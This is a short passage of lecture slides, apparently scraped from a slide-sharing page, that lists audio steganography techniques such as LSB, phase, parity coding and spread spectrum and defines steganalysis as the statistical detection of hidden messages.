    Audio Steganography  Embeddingsecret messages into digital sound is known as audio Steganography.
  • 76.
    Audio Steganography  Toembeddata secretly onto digital audio file there are few techniques introduced :  LSB Coding  Phase Coding  Parity Coding  Spread Spectrum
  • 78.
     Steganalysis isthe art and science of detecting a secret communication.  Hiding a message will most likely leave detectable traces in the cover medium.  The information hiding process changes the statistical properties of the cover, which is a steganalyst attempts to detect.  The process of attempting to detect statistical traces is called statistical steganalysis.
  • 79.
    IMPORTANT ASPECTS OF STEGANALYSIS DETECTING HIDDEN INFORMATION  DISABLING STEGANOGRAPHY